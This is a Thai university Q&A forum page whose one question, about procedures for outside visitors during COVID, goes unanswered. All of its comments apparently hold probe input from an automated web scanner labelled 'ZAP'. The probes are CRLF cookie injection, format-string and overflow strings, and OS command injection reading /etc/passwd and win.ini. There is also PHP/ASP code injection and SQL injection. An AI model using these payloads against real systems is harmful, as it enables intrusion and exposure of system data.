บุคคลภายนอกเข้ามาติดต่อในมหาวิทยาลัยช่วงโควิด ต้องมีขั้นตอนดำเนินการอย่างไรคะ


แสดงความคิดเห็น 1 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:29:02
แสดงความคิดเห็น 2 (ชือผู้ตอบ ZAP)
|

 

สร้างเมื่อ 2020-10-22 04:29:02
แสดงความคิดเห็น 3 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:29:02
แสดงความคิดเห็น 4 (ชือผู้ตอบ ZAP)
+

 

สร้างเมื่อ 2020-10-22 04:29:02
แสดงความคิดเห็น 5 (ชือผู้ตอบ ZAP)
@

 

สร้างเมื่อ 2020-10-22 04:29:02
แสดงความคิดเห็น 6 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:29:02
แสดงความคิดเห็น 7 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:29:02
แสดงความคิดเห็น 8 (ชือผู้ตอบ |)

 

สร้างเมื่อ 2020-10-22 04:29:02
แสดงความคิดเห็น 9 (ชือผู้ตอบ )

 

สร้างเมื่อ 2020-10-22 04:29:02
แสดงความคิดเห็น 10 (ชือผู้ตอบ +)

 

สร้างเมื่อ 2020-10-22 04:29:02
แสดงความคิดเห็น 11 (ชือผู้ตอบ @)

 

สร้างเมื่อ 2020-10-22 04:29:02
แสดงความคิดเห็น 12 (ชือผู้ตอบ )

 

สร้างเมื่อ 2020-10-22 04:29:02
แสดงความคิดเห็น 13 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:29:02
แสดงความคิดเห็น 14 (ชือผู้ตอบ ZAP)
any? Set-cookie: Tamper=f4e34ce1-0c32-454c-b3bc-14c3f6cb8eb0

 

สร้างเมื่อ 2020-10-22 04:26:18
แสดงความคิดเห็น 15 (ชือผู้ตอบ ZAP)
any Set-cookie: Tamper=f4e34ce1-0c32-454c-b3bc-14c3f6cb8eb0

 

สร้างเมื่อ 2020-10-22 04:26:18
แสดงความคิดเห็น 16 (ชือผู้ตอบ ZAP)
any? Set-cookie: Tamper=f4e34ce1-0c32-454c-b3bc-14c3f6cb8eb0

 

สร้างเมื่อ 2020-10-22 04:26:18
แสดงความคิดเห็น 17 (ชือผู้ตอบ ZAP)
any Set-cookie: Tamper=f4e34ce1-0c32-454c-b3bc-14c3f6cb8eb0

 

สร้างเมื่อ 2020-10-22 04:26:18
แสดงความคิดเห็น 18 (ชือผู้ตอบ ZAP)
any? Set-cookie: Tamper=f4e34ce1-0c32-454c-b3bc-14c3f6cb8eb0

 

สร้างเมื่อ 2020-10-22 04:26:18
แสดงความคิดเห็น 19 (ชือผู้ตอบ ZAP)
any Set-cookie: Tamper=f4e34ce1-0c32-454c-b3bc-14c3f6cb8eb0

 

สร้างเมื่อ 2020-10-22 04:26:18
แสดงความคิดเห็น 20 (ชือผู้ตอบ ZAP)
Set-cookie: Tamper=f4e34ce1-0c32-454c-b3bc-14c3f6cb8eb0

 

สร้างเมื่อ 2020-10-22 04:26:18
แสดงความคิดเห็น 21 (ชือผู้ตอบ Any? Set-cookie: Tamper=f4e34ce1-0c32-454c-b3bc-14c3f6cb8eb0 )

 

สร้างเมื่อ 2020-10-22 04:26:18
แสดงความคิดเห็น 22 (ชือผู้ตอบ Any Set-cookie: Tamper=f4e34ce1-0c32-454c-b3bc-14c3f6cb8eb0 )

 

สร้างเมื่อ 2020-10-22 04:26:18
แสดงความคิดเห็น 23 (ชือผู้ตอบ Any? Set-cookie: Tamper=f4e34ce1-0c32-454c-b3bc-14c3f6cb8eb0)

 

สร้างเมื่อ 2020-10-22 04:26:18
แสดงความคิดเห็น 24 (ชือผู้ตอบ Any Set-cookie: Tamper=f4e34ce1-0c32-454c-b3bc-14c3f6cb8eb0)

 

สร้างเมื่อ 2020-10-22 04:26:18
แสดงความคิดเห็น 25 (ชือผู้ตอบ Any? Set-cookie: Tamper=f4e34ce1-0c32-454c-b3bc-14c3f6cb8eb0)

 

สร้างเมื่อ 2020-10-22 04:26:18
แสดงความคิดเห็น 26 (ชือผู้ตอบ Any Set-cookie: Tamper=f4e34ce1-0c32-454c-b3bc-14c3f6cb8eb0)

 

สร้างเมื่อ 2020-10-22 04:26:18
แสดงความคิดเห็น 27 (ชือผู้ตอบ Set-cookie: Tamper=f4e34ce1-0c32-454c-b3bc-14c3f6cb8eb0)

 

สร้างเมื่อ 2020-10-22 04:26:18
แสดงความคิดเห็น 28 (ชือผู้ตอบ ZAP)
ZAP %1!s%2!s%3!s%4!s%5!s%6!s%7!s%8!s%9!s%10!s%11!s%12!s%13!s%14!s%15!s%16!s%17!s%18!s%19!s%20!s%21!n%22!n%23!n%24!n%25!n%26!n%27!n%28!n%29!n%30!n%31!n%32!n%33!n%34!n%35!n%36!n%37!n%38!n%39!n%40!n

 

สร้างเมื่อ 2020-10-22 04:24:00
แสดงความคิดเห็น 29 (ชือผู้ตอบ ZAP)
ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s

 

สร้างเมื่อ 2020-10-22 04:24:00
แสดงความคิดเห็น 30 (ชือผู้ตอบ ZAP)
ZAP

 

สร้างเมื่อ 2020-10-22 04:24:00
แสดงความคิดเห็น 31 (ชือผู้ตอบ ZAP %1!s%2!s%3!s%4!s%5!s%6!s%7!s%8!s%9!s%10!s%11!s%12!s%13!s%14!s%15!s%16!s%17!s%18!s%19!s%20!s%21!n%22!n%23!n%24!n%25!n%26!n%27!n%28!n%29!n%30!n%31!n%32!n%33!n%34!n%35!n%36!n%37!n%38!n%39!n%40!n )

 

สร้างเมื่อ 2020-10-22 04:24:00
แสดงความคิดเห็น 32 (ชือผู้ตอบ ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s )

 

สร้างเมื่อ 2020-10-22 04:24:00
แสดงความคิดเห็น 33 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:24:00
แสดงความคิดเห็น 34 (ชือผู้ตอบ ZAP)
PRLQikVyraSDUZMlfYehWsmmcXwirfSAvdRcDSJaVVGirjnyPGYnSsZALtgqbXsRlBoUFPthKpOciMwjMkeoexoQkqbRIiEmBMnvrcxgFrsCccDpXcoJeXiGDkuDRPwtRFlUOYnjqxgbRhfDAKHrxfSTgdgSNrkQHejKAMSZmCJNtSltaaAmJBSDDIHbHmGGBUDViHZfTFwZCIJckWaprYlLtlSvNManeLagpnTLVaVHnYDIhOmvuNqyitDQGQXEygXFupBhUVlIKRsypmNPupRWqSreVcYuPyReQePybpixfoGhyLRoOHfWHlUdglfCtpYSgHoqOOLascvoNVLaDJdeZKMwqMuxSAhkURUEHapPovlogDwcMcmaXTVEXFlNZZVkutwaBQZhILWslQLJLuynwZCAMLGXUKxCYwebUKoCtFreidOqjYIeZywheUdrruXnSjHRaJeYCQEYvdVUcTBEToqkVymWADvNVPTqPOjGcBCXKQZRGtrYmHeBffSJOgKGtODIGFyHMIFRpIhSEMknbQaFGRJJBJgKWIbEDwrnAMWTaNdUUhUbkYqeiTLWPvTYaTTryHgksNLlspULncxiKOQHlZTqhDatrfhEHruiPTrRfwHrbxspyEIqXtZijffioeSAUaRVpMHaoKxgkLNuMeZeoFswVjlVnaoTJXFfmwgXEgITdxxmufegvTeYoMFHKDfTdyvAukZsYcBFqOaLHUofxDbSELbFXWiGktDGKpHYonDFlusaNUjeHKnHVWReDYOKmZykluRxxCneAxkZXQgOGCNDtpgSBWyIDlOjMqSrqGvgtlbPTgnhvbNkCAtFYZCOsejoSuokZsapnOiDZqWJqivHuYImbXMILyoVeHHhHhBGPrURTPmFAMahxSuVwGuiRQPeUvLdOIRNMWgdDSnXenkkSLZhsmxPCdJIEcMErGTwtUgypbYkyvgcKFhxvZuTqiCAPMLPNbMrjwAOOejbBUrLdtftwIOCDZGQDeALrmmwcfoLdDsVRHIggQLSAboSmXgjmUdxKAJtQLQmXKouyfIaHdEPRUGIgNbjskLLrtThYNBJiwWGSBlkbAjPKVaZxNSrTndViGfkgdenIfBOCtDcuLVIRowmTtCIUxQYxKqCPyYAFsMIQUydsyNAtqRXZMdgSvGYMTRwpDoMYBSevpTymwvwtcRjKVGpifVKHmbmcTOlQOtEpNVFGDuKsprHbpemRSGJKkjmRjbcfEjGnBeyRMlBhOYuZIqsHhoxNRuUoKvjQcVbnVtBOYRLXyeVmFXyJaugMiovdLbeNJwThwrUSOgLSYLsUAQTcNIKoUoYtHyGeyOrNNybUsdyBHRkomYWWNAoSEuSsMSJVUgtADuUNuSVCShmJFqPSbxPDLLdGnwHXPXUiPsliufTvsRtAGQUvoyHMVpIMMGvhuGOYIFIPXfJDabTMOxmNLKMpfgpWXVZTXIyWMTrUwGwgtBQEnWkDVUFBWHUleRyPHhKuPqCuRgfMxQKckNarLOEuYMdBElKDjwOZeyIZpFfJrOCyPChaIChLdmVKpLUSTUdAkFcqcihqMlBJPZrZebBMEHPKXUkFXjWNoRPRIBkAZcXZUTuOsrCCtMYqNPRcfuVUUfLpVmJqngTZLtqRiWnTEfYpejFEwsjcaoZYFkQpPFEeXInkfTJkCwiPvgQPeOOwRTqusbPpjjYGlrAjDYSAxcVuZHNcwZOEQWypoPwqcGbdVEZOYDUHRlCBIumQqRuiesVSKmfYshwMNfKTfvRfdpkcbNKibDmVlhpMohPhOBdAWVNFfmwitvOirJZmVcqNSpnJamCFfTLsQKBrjXMmwrHiNWPkuJyvmfaTGuNRYivXsLOGykCoDZrYEAVDQcfKwLGSVMWZXgKrOCZkPgaIUTIWOeiDwauIFnYkspXZqBDBgpNOJLSaseJHgJZxIVxWCeyejDWxgaShZAPFBuAppZaLLJWHwyDNRfoeEiwYaoMqLCTnTiKpHNGeTpUYFYRvRYJHBpqLmoPbDpRnoyHPJQgYWgdbjrsJMbilYmxbhUmSuLpHsyYOZJkyhDORWYnpeoSEVRfBBaYdkWUxlTVXAqa

 

สร้างเมื่อ 2020-10-22 04:21:17
แสดงความคิดเห็น 35 (ชือผู้ตอบ KqZIGDFxBmldEVHVgkZkKpVPqDbKfLbbHytbnIeAdXeFoafdjfIQhCHYFEnQJDmTCOmPkXiEYEHqmTjEdMLcKuGuicHdoAOjYGqAiKXmkXrdmhnRLUIdeqVfhRoCFaZgTLpNXdFiQBZBwBqKxuNLJUXdydSYWbXVhBKojDRRJDbSPlITrgbEHympXckpuXaIqDVXmSpPTIIoPqeYcutLHADeUXXrVjtPHmIHSxuHTntoKcdIoJbqCMNgitiDdTy)

 

สร้างเมื่อ 2020-10-22 04:21:17
แสดงความคิดเห็น 36 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:16:29
แสดงความคิดเห็น 37 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 38 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 39 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 40 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 41 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 42 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 43 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 44 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 45 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 46 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 47 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 48 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 49 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 50 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 51 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 52 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 53 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 54 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 55 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 56 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 57 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 58 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 59 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 60 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 61 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 62 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 63 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 64 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 65 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 66 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 67 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 68 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 69 (ชือผู้ตอบ ZAP)
;start-sleep -s 15 #

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 70 (ชือผู้ตอบ ZAP)
';start-sleep -s 15

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 71 (ชือผู้ตอบ ZAP)
";start-sleep -s 15

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 72 (ชือผู้ตอบ ZAP)
;start-sleep -s 15

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 73 (ชือผู้ตอบ ZAP)
;get-help #

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 74 (ชือผู้ตอบ ZAP)
';get-help

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 75 (ชือผู้ตอบ ZAP)
";get-help

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 76 (ชือผู้ตอบ ZAP)
;get-help

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 77 (ชือผู้ตอบ ZAP)
'|timeout /T 15

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 78 (ชือผู้ตอบ ZAP)
'&timeout /T 15&'

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 79 (ชือผู้ตอบ ZAP)
"|timeout /T 15

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 80 (ชือผู้ตอบ ZAP)
"&timeout /T 15&"

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 81 (ชือผู้ตอบ ZAP)
|timeout /T 15

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 82 (ชือผู้ตอบ ZAP)
&timeout /T 15

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 83 (ชือผู้ตอบ ZAP)
'|type %SYSTEMROOT%\win.ini

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 84 (ชือผู้ตอบ ZAP)
'&type %SYSTEMROOT%\win.ini&'

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 85 (ชือผู้ตอบ ZAP)
"|type %SYSTEMROOT%\win.ini

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 86 (ชือผู้ตอบ ZAP)
"&type %SYSTEMROOT%\win.ini&"

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 87 (ชือผู้ตอบ ZAP)
|type %SYSTEMROOT%\win.ini

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 88 (ชือผู้ตอบ ZAP)
&type %SYSTEMROOT%\win.ini

 

สร้างเมื่อ 2020-10-22 04:11:10
แสดงความคิดเห็น 89 (ชือผู้ตอบ ZAP)
';sleep 15;'

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 90 (ชือผู้ตอบ ZAP)
'&sleep 15&'

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 91 (ชือผู้ตอบ ZAP)
";sleep 15;"

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 92 (ชือผู้ตอบ ZAP)
"&sleep 15&"

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 93 (ชือผู้ตอบ ZAP)
;sleep 15;

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 94 (ชือผู้ตอบ ZAP)
&sleep 15&

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 95 (ชือผู้ตอบ ZAP)
';cat /etc/passwd;'

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 96 (ชือผู้ตอบ ZAP)
'&cat /etc/passwd&'

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 97 (ชือผู้ตอบ ZAP)
";cat /etc/passwd;"

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 98 (ชือผู้ตอบ ZAP)
"&cat /etc/passwd&"

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 99 (ชือผู้ตอบ ZAP)
;cat /etc/passwd;

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 100 (ชือผู้ตอบ ZAP)
&cat /etc/passwd&

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 101 (ชือผู้ตอบ ZAP;start-sleep -s 15 #)

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 102 (ชือผู้ตอบ ZAP';start-sleep -s 15)

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 103 (ชือผู้ตอบ ZAP";start-sleep -s 15)

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 104 (ชือผู้ตอบ ZAP;start-sleep -s 15)

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 105 (ชือผู้ตอบ ZAP;get-help #)

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 106 (ชือผู้ตอบ ZAP';get-help)

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 107 (ชือผู้ตอบ ZAP";get-help)

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 108 (ชือผู้ตอบ ZAP;get-help)

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 109 (ชือผู้ตอบ ZAP'|timeout /T 15)

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 110 (ชือผู้ตอบ ZAP'&timeout /T 15&')

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 111 (ชือผู้ตอบ ZAP"|timeout /T 15)

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 112 (ชือผู้ตอบ ZAP"&timeout /T 15&")

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 113 (ชือผู้ตอบ ZAP|timeout /T 15)

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 114 (ชือผู้ตอบ ZAP&timeout /T 15)

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 115 (ชือผู้ตอบ ZAP'|type %SYSTEMROOT%\win.ini)

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 116 (ชือผู้ตอบ ZAP'&type %SYSTEMROOT%\win.ini&')

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 117 (ชือผู้ตอบ ZAP"|type %SYSTEMROOT%\win.ini)

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 118 (ชือผู้ตอบ ZAP"&type %SYSTEMROOT%\win.ini&")

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 119 (ชือผู้ตอบ ZAP|type %SYSTEMROOT%\win.ini)

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 120 (ชือผู้ตอบ ZAP&type %SYSTEMROOT%\win.ini)

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 121 (ชือผู้ตอบ ZAP';sleep 15;')

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 122 (ชือผู้ตอบ ZAP'&sleep 15&')

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 123 (ชือผู้ตอบ ZAP";sleep 15;")

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 124 (ชือผู้ตอบ ZAP"&sleep 15&")

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 125 (ชือผู้ตอบ ZAP;sleep 15;)

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 126 (ชือผู้ตอบ ZAP&sleep 15&)

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 127 (ชือผู้ตอบ ZAP';cat /etc/passwd;')

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 128 (ชือผู้ตอบ ZAP'&cat /etc/passwd&')

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 129 (ชือผู้ตอบ ZAP";cat /etc/passwd;")

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 130 (ชือผู้ตอบ ZAP"&cat /etc/passwd&")

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 131 (ชือผู้ตอบ ZAP;cat /etc/passwd;)

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 132 (ชือผู้ตอบ ZAP&cat /etc/passwd&)

 

สร้างเมื่อ 2020-10-22 04:11:09
แสดงความคิดเห็น 133 (ชือผู้ตอบ ZAP)
response.write(100,000*100,000)

 

สร้างเมื่อ 2020-10-22 04:08:19
แสดงความคิดเห็น 134 (ชือผู้ตอบ ZAP)
+response.write({0}*{1})+

 

สร้างเมื่อ 2020-10-22 04:08:19
แสดงความคิดเห็น 135 (ชือผู้ตอบ ZAP)
"+response.write([100,000*100,000)+"

 

สร้างเมื่อ 2020-10-22 04:08:19
แสดงความคิดเห็น 136 (ชือผู้ตอบ ZAP)
;print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));

 

สร้างเมื่อ 2020-10-22 04:08:19
แสดงความคิดเห็น 137 (ชือผู้ตอบ ZAP)
${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}\

 

สร้างเมื่อ 2020-10-22 04:08:19
แสดงความคิดเห็น 138 (ชือผู้ตอบ ZAP)
${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}

 

สร้างเมื่อ 2020-10-22 04:08:19
แสดงความคิดเห็น 139 (ชือผู้ตอบ ZAP)
';print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));$var='

 

สร้างเมื่อ 2020-10-22 04:08:19
แสดงความคิดเห็น 140 (ชือผู้ตอบ ZAP)
";print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));$var="

 

สร้างเมื่อ 2020-10-22 04:08:19
แสดงความคิดเห็น 141 (ชือผู้ตอบ Response.write(100,000*100,000))

 

สร้างเมื่อ 2020-10-22 04:08:19
แสดงความคิดเห็น 142 (ชือผู้ตอบ +response.write({0}*{1})+)

 

สร้างเมื่อ 2020-10-22 04:08:19
แสดงความคิดเห็น 143 (ชือผู้ตอบ "+response.write([100,000*100,000)+")

 

สร้างเมื่อ 2020-10-22 04:08:19
แสดงความคิดเห็น 144 (ชือผู้ตอบ ;print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));)

 

สร้างเมื่อ 2020-10-22 04:08:19
แสดงความคิดเห็น 145 (ชือผู้ตอบ ${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}\)

 

สร้างเมื่อ 2020-10-22 04:08:19
แสดงความคิดเห็น 146 (ชือผู้ตอบ ${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))})

 

สร้างเมื่อ 2020-10-22 04:08:19
แสดงความคิดเห็น 147 (ชือผู้ตอบ ';print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));$var=')

 

สร้างเมื่อ 2020-10-22 04:08:19
แสดงความคิดเห็น 148 (ชือผู้ตอบ ";print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));$var=")

 

สร้างเมื่อ 2020-10-22 04:08:18
แสดงความคิดเห็น 149 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 150 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 151 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 152 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 153 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 154 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 155 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 156 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 157 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 158 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 159 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 160 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 161 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 162 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 163 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 164 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 165 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 166 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 167 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 168 (ชือผู้ตอบ ZAP)
') UNION ALL select NULL --

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 169 (ชือผู้ตอบ ZAP)
) UNION ALL select NULL --

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 170 (ชือผู้ตอบ ZAP)
" UNION ALL select NULL --

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 171 (ชือผู้ตอบ ZAP)
' UNION ALL select NULL --

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 172 (ชือผู้ตอบ ZAP)
UNION ALL select NULL --

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 173 (ชือผู้ตอบ ZAP)
' OR '1'='1' --

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 174 (ชือผู้ตอบ ZAP)
' AND '1'='2' --

 

สร้างเมื่อ 2020-10-22 04:04:33
